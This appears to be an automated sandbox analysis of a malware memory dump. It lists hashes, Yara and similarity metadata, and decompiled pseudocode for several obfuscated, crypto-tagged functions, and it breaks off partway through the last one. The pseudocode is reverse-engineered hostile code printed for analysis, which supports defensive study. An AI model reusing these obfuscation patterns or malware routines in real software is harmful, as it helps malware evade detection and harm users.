Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: -J$9?$NBD$NBD$P^$Sz$Vf.
API String ID: 0-1644255200
Opcode ID: 2fc96f79412fabb32039ac73d88a3ac6fb37e93871214a8a01012283284afc96
Instruction ID: 24d1115bf29bbe7abf8317925445f56f330301006df0a6f1d403dd6ad13ba130
Opcode Fuzzy Hash: 2fc96f79412fabb32039ac73d88a3ac6fb37e93871214a8a01012283284afc96
Instruction Fuzzy Hash: 6CE122B15093819FC3A8CF25D58A64BFBF1FBD4348F508A0DF19A86260D7B48949CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00BC473A, Relevance: 9.0, Strings: 7, Instructions: 261
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00BC473A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				void* _v80;
				intOrPtr _v84;
				char _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				void* _t256;
				void* _t284;
				void* _t295;
				void* _t297;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				char _t333;
				signed int* _t336;

				_t295 = __ecx;
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E00BB8002(_t256);
				_v84 = 0x50cd84;
				_v88 = 0;
				asm("stosd");
				_t336 =  &(( &_v188)[0xa]);
				_t333 = 0;
				_t297 = 0xdb7f4e5;
				asm("stosd");
				asm("stosd");
				_v100 = 0xa9da3;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0054e918;
				_v148 = 0xf2e0f3;
				_t325 = 0x25;
				_v148 = _v148 / _t325;
				_t326 = 0x6f;
				_v148 = _v148 / _t326;
				_v148 = _v148 ^ 0x00000f03;
				_v144 = 0x6edd53;
				_v144 = _v144 ^ 0x75267415;
				_v144 = _v144 + 0xffff86e0;
				_v144 = _v144 ^ 0x7540d20b;
				_v156 = 0x7df93c;
				_v156 = _v156 ^ 0x3c5d4161;
				_v156 = _v156 + 0x84f0;
				_v156 = _v156 ^ 0x3c2aa1d8;
				_v116 = 0x1bac1c;
				_v116 = _v116 ^ 0xc65285cd;
				_v116 = _v116 ^ 0xc644098e;
				_v152 = 0xe7d648;
				_t327 = 0x1c;
				_v152 = _v152 / _t327;
				_v152 = _v152 * 0x7e;
				_v152 = _v152 ^ 0x04159530;
				_v180 = 0xfd4a22;
				_v180 = _v180 << 6;
				_v180 = _v180 ^ 0x7189355a;
				_v180 = _v180 * 0x6a;
				_v180 = _v180 ^ 0xa6f7bea2;
				_v172 = 0x73be8c;
				_v172 = _v172 + 0xffff9acb;
				_v172 = _v172 | 0x8f59951b;
				_v172 = _v172 >> 5;
				_v172 = _v172 ^ 0x0474fd96;
				_v96 = 0x9cd9a9;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 ^ 0x0008b664;
				_v108 = 0xd27ff2;
				_v108 = _v108 * 0x6d;
				_v108 = _v108 ^ 0x59ae7d29;
				_v112 = 0x62b4b9;
				_v112 = _v112 >> 7;
				_v112 = _v112 ^ 0x000d707c;
				_v124 = 0xb4db98;
				_v124 = _v124 ^ 0xc4a005a6;
				_v124 = _v124 >> 7;
				_v124 = _v124 ^ 0x018828a5;
				_v140 = 0xd35305;
				_t328 = 0x7c;
				_v140 = _v140 / _t328;
				_v140 = _v140 + 0xffff7c77;
				_v140 = _v140 ^ 0x00050917;
				_v184 = 0x3bd7e7;
				_t329 = 0x16;
				_v184 = _v184 * 0x5c;
				_v184 = _v184 >> 0xd;
				_v184 = _v184 << 0xe;
				_v184 = _v184 ^ 0x2b0b2c99;
				_v188 = 0xb75786;
				_v188 = _v188 | 0xc20c45a2;
				_v188 = _v188 + 0xfc9d;
				_v188 = _v188 * 5;
				_v188 = _v188 ^ 0xcdcca17c;
				_v132 = 0x50fe2a;
				_v132 = _v132 + 0xffffc47a;
				_v132 = _v132 ^ 0x4a1d7ab9;
				_v132 = _v132 ^ 0x4a4e171c;
				_v164 = 0xbe6627;
				_v164 = _v164 << 0xf;
				_v164 = _v164 + 0x2340;
				_v164 = _v164 + 0xffff7d21;
				_v164 = _v164 ^ 0x3313ce90;
				_v92 = 0xf290a5;
				_v92 = _v92 * 0x5b;
				_v92 = _v92 ^ 0x563c5ede;
				_v168 = 0x266085;
				_v168 = _v168 >> 1;
				_v168 = _v168 + 0xd8ec;
				_v168 = _v168 << 0x10;
				_v168 = _v168 ^ 0x0928612d;
				_v176 = 0x24f96d;
				_v176 = _v176 + 0xfffffd6f;
				_v176 = _v176 | 0x1d68e396;
				_v176 = _v176 / _t329;
				_v176 = _v176 ^ 0x015af940;
				_v104 = 0x2a05e3;
				_v104 = _v104 + 0x57b5;
				_v104 = _v104 ^ 0x002cce9c;
				_v160 = 0xac1009;
				_v160 = _v160 + 0x90f7;
				_t330 = 0xc;
				_v160 = _v160 * 0x58;
				_v160 = _v160 + 0x4940;
				_v160 = _v160 ^ 0x3b5783c1;
				_v120 = 0xc13141;
				_v120 = _v120 + 0x29f0;
				_v120 = _v120 / _t330;
				_v120 = _v120 ^ 0x001f9d62;
				_v128 = 0xc04b27;
				_t331 = 0x41;
				_v128 = _v128 / _t331;
				_v128 = _v128 * 0x78;
				_v128 = _v128 ^ 0x0168de01;
				_v136 = 0xa87ade;
				_v136 = _v136 >> 0xc;
				_v136 = _v136 / _t331;
				_v136 = _v136 ^ 0x00002647;
				do {
					while(_t297 != 0x3ea60e2) {
						if(_t297 == 0x8ffc4d4) {
							E00BB3965(_v116, _v152,  &_v68, _v180, 0x44, _v172);
							_t300 = _v96;
							_push(0xbb1150);
							_v68 = 0x44;
							_v60 = E00BD0AD3(_v96, _v108, __eflags);
							_t333 = E00BB8003(_v112, _a20, _v124, _v140, _v88, _v96, _a8, _v184,  &_v68, _t300, _v188, _v132, _v164, _t300, _t295, _v92, _v148 | _v100, 0);
							E00BC2EED(_v168, _v176, _v104, _v60);
							_t336 =  &(_t336[0x18]);
							_t297 = 0xb1dffd0;
							continue;
						} else {
							if(_t297 == 0xb1dffd0) {
								E00BBC5DA(_v160, _v120, _v128, _v88, _v136);
							} else {
								if(_t297 != 0xdb7f4e5) {
									goto L10;
								} else {
									_t297 = 0x3ea60e2;
									continue;
								}
							}
						}
						L13:
						return _t333;
					}
					_t284 = E00BBB058(_v144, _v156, _a8,  &_v88);
					_t336 =  &(_t336[3]);
					__eflags = _t284;
					if(_t284 == 0) {
						_t297 = 0x10e7533;
						goto L10;
					} else {
						_t297 = 0x8ffc4d4;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t297 - 0x10e7533;
				} while (_t297 != 0x10e7533);
				goto L13;
			}

0x00bc4746
0x00bc4748
0x00bc4749
0x00bc4750
0x00bc4757
0x00bc475e
0x00bc4765
0x00bc476c
0x00bc4773
0x00bc477a
0x00bc477b
0x00bc477c
0x00bc4781
0x00bc4793
0x00bc479c
0x00bc479d
0x00bc47a0
0x00bc47a2
0x00bc47a7
0x00bc47aa
0x00bc47ab
0x00bc47b3
0x00bc47b8
0x00bc47c0
0x00bc47cc
0x00bc47d1
0x00bc47db
0x00bc47e0
0x00bc47e6
0x00bc47ee
0x00bc47f6
0x00bc47fe
0x00bc4806
0x00bc480e
0x00bc4816
0x00bc481e
0x00bc4826
0x00bc482e
0x00bc4836
0x00bc483e
0x00bc4846
0x00bc4852
0x00bc4855
0x00bc485e
0x00bc4862
0x00bc486a
0x00bc4872
0x00bc4877
0x00bc4884
0x00bc4888
0x00bc4890
0x00bc4898
0x00bc48a0
0x00bc48a8
0x00bc48ad
0x00bc48b5
0x00bc48bd
0x00bc48c2
0x00bc48ca
0x00bc48d7
0x00bc48db
0x00bc48e5
0x00bc48ed
0x00bc48f2
0x00bc48fa
0x00bc4902
0x00bc490a
0x00bc490f
0x00bc4917
0x00bc4925
0x00bc492a
0x00bc4930
0x00bc4938
0x00bc4940
0x00bc494d
0x00bc4950
0x00bc4954
0x00bc4959
0x00bc495e
0x00bc4966
0x00bc496e
0x00bc4976
0x00bc4983
0x00bc4987
0x00bc498f
0x00bc4997
0x00bc499f
0x00bc49a7
0x00bc49af
0x00bc49b7
0x00bc49bc
0x00bc49c4
0x00bc49cc
0x00bc49d4
0x00bc49e1
0x00bc49e5
0x00bc49ed
0x00bc49f5
0x00bc49f9
0x00bc4a01
0x00bc4a06
0x00bc4a0e
0x00bc4a16
0x00bc4a1e
0x00bc4a2e
0x00bc4a32
0x00bc4a3a
0x00bc4a42
0x00bc4a4a
0x00bc4a52
0x00bc4a5a
0x00bc4a67
0x00bc4a6a
0x00bc4a6e
0x00bc4a76
0x00bc4a7e
0x00bc4a86
0x00bc4a96
0x00bc4a9a
0x00bc4aa2
0x00bc4aae
0x00bc4ab1
0x00bc4ac1
0x00bc4ac5
0x00bc4acd
0x00bc4ad5
0x00bc4ae5
0x00bc4ae9
0x00bc4af1
0x00bc4af1
0x00bc4afb
0x00bc4b33
0x00bc4b3c
0x00bc4b40
0x00bc4b45
0x00bc4b58
0x00bc4bbd
0x00bc4bce
0x00bc4bd3
0x00bc4bd6
0x00000000
0x00bc4afd
0x00bc4b03
0x00bc4c2e
0x00bc4b09
0x00bc4b0f
0x00000000
0x00bc4b15
0x00bc4b15
0x00000000
0x00bc4b15
0x00bc4b0f
0x00bc4b03
0x00bc4c37
0x00bc4c42
0x00bc4c42
0x00bc4bf4
0x00bc4bf9
0x00bc4bfc
0x00bc4bfe
0x00bc4c07
0x00000000
0x00bc4c00
0x00bc4c00
0x00000000
0x00bc4c00
0x00000000
0x00bc4c0c
0x00bc4c0c
0x00bc4c0c
0x00000000

Strings

G&, xrefs: 00BC4AE9
@#, xrefs: 00BC49BC
aA]<, xrefs: 00BC4816
@I, xrefs: 00BC4A6E
-a(, xrefs: 00BC4A06
D, xrefs: 00BC4B45
|p, xrefs: 00BC48F2

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: -a($@#$@I$D$G&$aA]<$|p
API String ID: 0-3359372099
Opcode ID: aafb787cfc7a3c2afd38b0871ade779781d57b1c9976658d6e518cc13cb6b866
Instruction ID: 5733568814d6fae7dbf3f9c2b1495c570c24e7cf564d3d68cf1b55b37152221d
Opcode Fuzzy Hash: aafb787cfc7a3c2afd38b0871ade779781d57b1c9976658d6e518cc13cb6b866
Instruction Fuzzy Hash: 0EC1FF725083809FD368CF25C98AA5BFBE2FBC5748F508A1DF29596260D3B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00BC04A4, Relevance: 9.0, Strings: 7, Instructions: 202
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00BC04A4() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t190;
				void* _t192;
				intOrPtr* _t197;
				signed int _t199;
				intOrPtr* _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				void* _t207;
				void* _t212;
				void* _t234;
				signed int* _t238;

				_t238 =  &_v80;
				_v76 = 0x90415e;
				_v4 = 0;
				_v76 = _v76 * 0x3a;
				_t234 = 0xe71254f;
				_v76 = _v76 << 5;
				_t202 = 0x53;
				_v76 = _v76 / _t202;
				_v76 = _v76 ^ 0x80436582;
				_v36 = 0x1f357d;
				_v36 = _v36 | 0x358f7f35;
				_v36 = _v36 ^ 0x359f7f7f;
				_v56 = 0x830fc1;
				_v56 = _v56 | 0x4976aaf9;
				_v56 = _v56 ^ 0x80c68497;
				_v56 = _v56 ^ 0xc93bab44;
				_v80 = 0xd7434;
				_t203 = 0x60;
				_v80 = _v80 * 0x5d;
				_v80 = _v80 / _t203;
				_v80 = _v80 >> 1;
				_v80 = _v80 ^ 0x0005c1c2;
				_v40 = 0x7826b6;
				_v40 = _v40 | 0xb8256148;
				_v40 = _v40 + 0x484c;
				_v40 = _v40 ^ 0xb876fcf8;
				_v16 = 0xf99d8b;
				_v16 = _v16 ^ 0xe4684dc9;
				_v16 = _v16 ^ 0xe49aa9e9;
				_v44 = 0xcb7cba;
				_v44 = _v44 << 7;
				_t204 = 0x56;
				_v44 = _v44 / _t204;
				_v44 = _v44 ^ 0x012c985e;
				_v20 = 0x84ba4d;
				_v20 = _v20 + 0x1528;
				_v20 = _v20 ^ 0x0089522e;
				_v48 = 0xd6cec2;
				_v48 = _v48 + 0xffffaa91;
				_v48 = _v48 + 0xb4ec;
				_v48 = _v48 ^ 0x00d10b86;
				_v52 = 0x4eabb6;
				_t205 = 0x61;
				_v52 = _v52 * 0x27;
				_v52 = _v52 ^ 0xe822c6cc;
				_v52 = _v52 ^ 0xe3dbc3a8;
				_v28 = 0xaf49bd;
				_v28 = _v28 << 5;
				_v28 = _v28 | 0x95363c01;
				_v28 = _v28 ^ 0x95fa5f23;
				_v32 = 0xf13234;
				_v32 = _v32 | 0x7b1d3f93;
				_v32 = _v32 ^ 0x42e57d48;
				_v32 = _v32 ^ 0x39139efc;
				_v72 = 0x4f1e65;
				_v72 = _v72 | 0xa0a51414;
				_v72 = _v72 / _t205;
				_t199 = _v4;
				_t206 = 0x35;
				_v72 = _v72 / _t206;
				_v72 = _v72 ^ 0x000a038e;
				_v24 = 0x15139c;
				_v24 = _v24 >> 0xb;
				_v24 = _v24 ^ 0x000e2bcf;
				_v60 = 0xd0b0ba;
				_v60 = _v60 * 7;
				_v60 = _v60 >> 1;
				_v60 = _v60 ^ 0x02dae1aa;
				_v64 = 0x949590;
				_v64 = _v64 + 0xffff8140;
				_v64 = _v64 * 0x45;
				_v64 = _v64 + 0x9395;
				_v64 = _v64 ^ 0x27e7e8ef;
				_v68 = 0xf56216;
				_v68 = _v68 << 0x10;
				_v68 = _v68 >> 3;
				_v68 = _v68 << 0xa;
				_v68 = _v68 ^ 0x0b01e78f;
				_v12 = 0x97fa04;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x0023afef;
				while(1) {
					L1:
					_t207 = 0x5c;
					while(1) {
						_t190 = 0xde2277d;
						do {
							L3:
							while(_t234 != 0x53e1990) {
								if(_t234 == 0xb30e156) {
									_t192 = E00BD0AD3(_v56, _v80, __eflags);
									_t212 = 0xbb149c;
									__eflags = E00BB2089(_v36, _v40, _t212, _v16, _v44, _v20, _t212,  &_v8, _t212, _t212, _v48, _v76, _v52, _t192);
									_t234 =  ==  ? 0xde2277d : 0xa1a247d;
									E00BC2EED(_v28, _v32, _v72, _t192);
									_t238 =  &(_t238[0xf]);
									L16:
									_t190 = 0xde2277d;
									_t207 = 0x5c;
								} else {
									if(_t234 == 0xc50c5c6) {
										_t201 =  *0xbd5bd8 + 0x30;
										while(1) {
											__eflags =  *_t201 - _t207;
											if(__eflags == 0) {
												break;
											}
											_t201 = _t201 + 2;
											__eflags = _t201;
										}
										_t199 = _t201 + 2;
										_t234 = 0xb30e156;
										_t190 = 0xde2277d;
										continue;
									} else {
										if(_t234 == _t190) {
											_t197 = E00BB5D0C(_v24, _v60, _v8, _t199);
											_t234 = 0x53e1990;
											__eflags = _t197;
											_v4 = 0 | __eflags == 0x00000000;
											goto L1;
										} else {
											if(_t234 == 0xe71254f) {
												_t234 = 0xc50c5c6;
												continue;
											}
										}
									}
								}
								goto L17;
							}
							E00BD2A25(_v64, _v68, _v8, _v12);
							_t234 = 0xa1a247d;
							goto L16;
							L17:
							__eflags = _t234 - 0xa1a247d;
						} while (__eflags != 0);
						return _v4;
					}
				}
			}

0x00bc04a4
0x00bc04a7
0x00bc04b1
0x00bc04c0
0x00bc04c4
0x00bc04c9
0x00bc04d4
0x00bc04d9
0x00bc04df
0x00bc04e7
0x00bc04ef
0x00bc04f7
0x00bc04ff
0x00bc0507
0x00bc050f
0x00bc0517
0x00bc051f
0x00bc052c
0x00bc052f
0x00bc053b
0x00bc053f
0x00bc0543
0x00bc054b
0x00bc0553
0x00bc055b
0x00bc0563
0x00bc056b
0x00bc0573
0x00bc057b
0x00bc0583
0x00bc058b
0x00bc0594
0x00bc0599
0x00bc059f
0x00bc05a7
0x00bc05af
0x00bc05b7
0x00bc05bf
0x00bc05c7
0x00bc05cf
0x00bc05d7
0x00bc05df
0x00bc05ec
0x00bc05ed
0x00bc05f1
0x00bc05f9
0x00bc0601
0x00bc0609
0x00bc060e
0x00bc0616
0x00bc061e
0x00bc0626
0x00bc062e
0x00bc0636
0x00bc063e
0x00bc0646
0x00bc0654
0x00bc0660
0x00bc0664
0x00bc066c
0x00bc0670
0x00bc0678
0x00bc0680
0x00bc0685
0x00bc068d
0x00bc069a
0x00bc069e
0x00bc06a2
0x00bc06aa
0x00bc06b2
0x00bc06bf
0x00bc06c3
0x00bc06cb
0x00bc06d3
0x00bc06db
0x00bc06e0
0x00bc06e5
0x00bc06ea
0x00bc06f2
0x00bc06fa
0x00bc06ff
0x00bc0707
0x00bc0707
0x00bc0709
0x00bc070a
0x00bc070a
0x00bc070f
0x00000000
0x00bc070f
0x00bc0721
0x00bc0792
0x00bc0797
0x00bc07c9
0x00bc07e2
0x00bc07e5
0x00bc07ea
0x00bc0808
0x00bc080a
0x00bc080f
0x00bc0723
0x00bc0729
0x00bc076e
0x00bc0776
0x00bc0776
0x00bc0779
0x00000000
0x00000000
0x00bc0773
0x00bc0773
0x00bc0773
0x00bc077b
0x00bc077e
0x00bc070a
0x00000000
0x00bc072b
0x00bc072d
0x00bc074f
0x00bc0758
0x00bc075d
0x00bc0762
0x00000000
0x00bc072f
0x00bc0735
0x00bc073b
0x00000000
0x00bc073b
0x00bc0735
0x00bc072d
0x00bc0729
0x00000000
0x00bc0721
0x00bc07ff
0x00bc0806
0x00000000
0x00bc0810
0x00bc0810
0x00bc0810
0x00bc0823
0x00bc0823
0x00bc070a

Strings

H}B, xrefs: 00BC062E
}', xrefs: 00BC07D6
', xrefs: 00BC06CB
4t, xrefs: 00BC051F
}', xrefs: 00BC080A
}', xrefs: 00BC070A
LH, xrefs: 00BC055B

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 4t$H}B$LH$}'$}'$}'$'
API String ID: 0-3450385318
Opcode ID: bc228e935cf7800b28acc0a57f1be53465a56f618ffa79f94b4e2f35437cf273
Instruction ID: 2311baea2410562a96e2e66517911f3a9b9562c65dfaa7bbccb4f488d662d062
Opcode Fuzzy Hash: bc228e935cf7800b28acc0a57f1be53465a56f618ffa79f94b4e2f35437cf273
Instruction Fuzzy Hash: D9912F722093409FC358DF65D58A91BFBF2FBC8748F108A4EF19996260D7B19A488F46

Uniqueness

Uniqueness Score: -1.00%

Function 00BC604E, Relevance: 9.0, Strings: 7, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00BC604E(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				short _v108;
				char* _v112;
				char* _v116;
				signed int _v120;
				char _v124;
				char _v644;
				char _v1164;
				void* _t221;
				signed int _t258;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				void* _t294;

				_push(_a12);
				_t294 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00BB8002(_t221);
				_v68 = 0x474568;
				_v68 = _v68 << 0x10;
				_v68 = _v68 ^ 0x45680001;
				_v72 = 0x1fd105;
				_t262 = 0x64;
				_v72 = _v72 / _t262;
				_v72 = _v72 ^ 0x00005767;
				_v36 = 0x73866;
				_v36 = _v36 + 0x28fb;
				_v36 = _v36 ^ 0x8b6ccc06;
				_v36 = _v36 + 0xaac8;
				_v36 = _v36 ^ 0x8b6c502f;
				_v40 = 0x4d98b5;
				_v40 = _v40 + 0xffffb7dc;
				_v40 = _v40 << 2;
				_v40 = _v40 + 0xffff2e34;
				_v40 = _v40 ^ 0x0131ee55;
				_v48 = 0x2c2527;
				_v48 = _v48 >> 0xc;
				_t263 = 0x4d;
				_v48 = _v48 / _t263;
				_v48 = _v48 ^ 0x000b9df5;
				_v56 = 0xcca1e4;
				_v56 = _v56 + 0xffff04fb;
				_v56 = _v56 >> 2;
				_v56 = _v56 ^ 0x003e6d66;
				_v52 = 0x7c2c39;
				_t264 = 0x39;
				_v52 = _v52 * 0x5b;
				_v52 = _v52 + 0x6a24;
				_v52 = _v52 ^ 0x2c2a50b8;
				_v32 = 0xb101ad;
				_v32 = _v32 + 0x6814;
				_v32 = _v32 | 0x8e84c1d7;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x7a79d119;
				_v92 = 0xede714;
				_v92 = _v92 * 0x1a;
				_v92 = _v92 ^ 0x1828e183;
				_v16 = 0xf7f2a5;
				_v16 = _v16 * 0x39;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 / _t264;
				_v16 = _v16 ^ 0x000c6752;
				_v88 = 0x2d2236;
				_v88 = _v88 * 0x54;
				_v88 = _v88 ^ 0x0ec13d56;
				_v76 = 0xd4d7e0;
				_v76 = _v76 >> 0x10;
				_v76 = _v76 ^ 0x000bd9b8;
				_v12 = 0xc4fe74;
				_v12 = _v12 + 0xffff5135;
				_v12 = _v12 << 3;
				_v12 = _v12 | 0x93884f64;
				_v12 = _v12 ^ 0x97a45a93;
				_v8 = 0x39e7f2;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 | 0xbad3ea11;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x00283554;
				_v24 = 0xf498c4;
				_v24 = _v24 >> 9;
				_t265 = 0x63;
				_v24 = _v24 * 0x7e;
				_v24 = _v24 ^ 0x87dfcbb0;
				_v24 = _v24 ^ 0x87e1fc29;
				_v64 = 0xf8b67e;
				_v64 = _v64 * 0x3a;
				_v64 = _v64 ^ 0x3855293f;
				_v20 = 0xd541f4;
				_v20 = _v20 >> 2;
				_t266 = 0x76;
				_v20 = _v20 / _t265;
				_v20 = _v20 / _t266;
				_v20 = _v20 ^ 0x000094d1;
				_v84 = 0xf7e2e5;
				_v84 = _v84 >> 2;
				_v84 = _v84 ^ 0x003391f7;
				_v28 = 0x2256f5;
				_v28 = _v28 << 0xe;
				_v28 = _v28 + 0xffff0450;
				_v28 = _v28 ^ 0x1649c64a;
				_v28 = _v28 ^ 0x83f4877d;
				_v60 = 0xb59cd9;
				_v60 = _v60 ^ 0x7ad550fb;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x000f47ea;
				_v44 = 0x9093fa;
				_v44 = _v44 >> 0x10;
				_v44 = _v44 | 0xe2be2270;
				_t267 = 0x4f;
				_v44 = _v44 / _t267;
				_v44 = _v44 ^ 0x02d7a7cd;
				_v80 = 0xd083c6;
				_v80 = _v80 >> 0xc;
				_v80 = _v80 ^ 0x000607c1;
				E00BB3965(_v40, _v48,  &_v124, _v56, 0x1e, _v52);
				E00BB3965(_v32, _v92,  &_v644, _v16, 0x208, _v88);
				E00BB3965(_v76, _v12,  &_v1164, _v8, 0x208, _v24);
				E00BBE112(_a8, _v64, _v20,  &_v644);
				E00BBE112(_t294, _v84, _v28,  &_v1164);
				_v120 = _v68;
				_v116 =  &_v644;
				_v112 =  &_v1164;
				_v108 = _v36 | _v72 | 0x00000410;
				_t258 = E00BC828A(_v60, _v44, _v80,  &_v124);
				asm("sbb eax, eax");
				return  ~_t258 + 1;
			}

0x00bc6059
0x00bc605c
0x00bc605e
0x00bc6061
0x00bc6064
0x00bc6065
0x00bc6066
0x00bc606b
0x00bc6074
0x00bc6078
0x00bc607f
0x00bc608b
0x00bc6090
0x00bc6095
0x00bc609c
0x00bc60a3
0x00bc60aa
0x00bc60b1
0x00bc60b8
0x00bc60bf
0x00bc60c6
0x00bc60cd
0x00bc60d1
0x00bc60d8
0x00bc60df
0x00bc60e6
0x00bc60ed
0x00bc60f2
0x00bc60f7
0x00bc60fe
0x00bc6105
0x00bc610c
0x00bc6110
0x00bc6117
0x00bc6122
0x00bc6123
0x00bc6126
0x00bc612d
0x00bc6134
0x00bc613b
0x00bc6142
0x00bc6149
0x00bc614d
0x00bc6154
0x00bc615f
0x00bc6162
0x00bc6169
0x00bc6174
0x00bc6177
0x00bc6180
0x00bc6183
0x00bc618a
0x00bc6195
0x00bc6198
0x00bc619f
0x00bc61a6
0x00bc61aa
0x00bc61b1
0x00bc61b8
0x00bc61bf
0x00bc61c3
0x00bc61ca
0x00bc61d1
0x00bc61d8
0x00bc61de
0x00bc61e5
0x00bc61e9
0x00bc61f0
0x00bc61f7
0x00bc6201
0x00bc6204
0x00bc6207
0x00bc620e
0x00bc6215
0x00bc6220
0x00bc6223
0x00bc622a
0x00bc6231
0x00bc623a
0x00bc623b
0x00bc6247
0x00bc624c
0x00bc6253
0x00bc625a
0x00bc625e
0x00bc6265
0x00bc626c
0x00bc6270
0x00bc6277
0x00bc627e
0x00bc6285
0x00bc628c
0x00bc6293
0x00bc6297
0x00bc629e
0x00bc62a5
0x00bc62a9
0x00bc62b3
0x00bc62b6
0x00bc62bc
0x00bc62c3
0x00bc62ca
0x00bc62ce
0x00bc62e4
0x00bc6302
0x00bc631b
0x00bc6333
0x00bc6347
0x00bc634f
0x00bc6358
0x00bc6361
0x00bc636f
0x00bc6380
0x00bc638a
0x00bc6392

Strings

T5(, xrefs: 00BC61E9
?)U8, xrefs: 00BC6223
hEG, xrefs: 00BC606B
fm>, xrefs: 00BC6110
6"-, xrefs: 00BC618A
9,|, xrefs: 00BC6117
'%,, xrefs: 00BC60DF

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: '%,$6"-$9,|$?)U8$T5($fm>$hEG
API String ID: 0-4282948982
Opcode ID: 97228ab59ed9630f98e9f0e5e78fbbfcc72a5cdc37ae4c889db6885b95efb7da
Instruction ID: 00ec238ca96d3eb0e3423e10e07b2c51910acbfe8b1136edba30bbee4e3ff8c5
Opcode Fuzzy Hash: 97228ab59ed9630f98e9f0e5e78fbbfcc72a5cdc37ae4c889db6885b95efb7da
Instruction Fuzzy Hash: 48A11FB5D0121CEBCF08CFE5D98A8DEBBB2FB44704F20815AE416BA250D7B55A49CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00BC3130, Relevance: 7.9, Strings: 6, Instructions: 386
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E00BC3130(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				unsigned int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* __ecx;
				intOrPtr _t385;
				void* _t400;
				signed int _t403;
				intOrPtr _t407;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				intOrPtr _t419;
				void* _t449;
				intOrPtr* _t459;
				signed int _t462;
				intOrPtr _t467;
				signed int* _t469;
				void* _t473;

				_push(_a12);
				_push(_a8);
				_v16 = __edx;
				_push(_a4);
				_push(__edx);
				E00BB8002(__edx);
				_v84 = 0x5d169f;
				_t469 =  &(( &_v168)[5]);
				_v84 = _v84 ^ 0x34c04b16;
				_v84 = _v84 + 0x1e93;
				_t407 = 0;
				_v84 = _v84 ^ 0x349d7c1d;
				_t467 = 0;
				_v24 = 0xb64937;
				_t462 = 0xb622cd8;
				_v24 = _v24 + 0x1155;
				_v24 = _v24 ^ 0x00b65a8d;
				_v28 = 0xd9d321;
				_v28 = _v28 << 3;
				_v28 = _v28 ^ 0x06ce9909;
				_v116 = 0xa845e4;
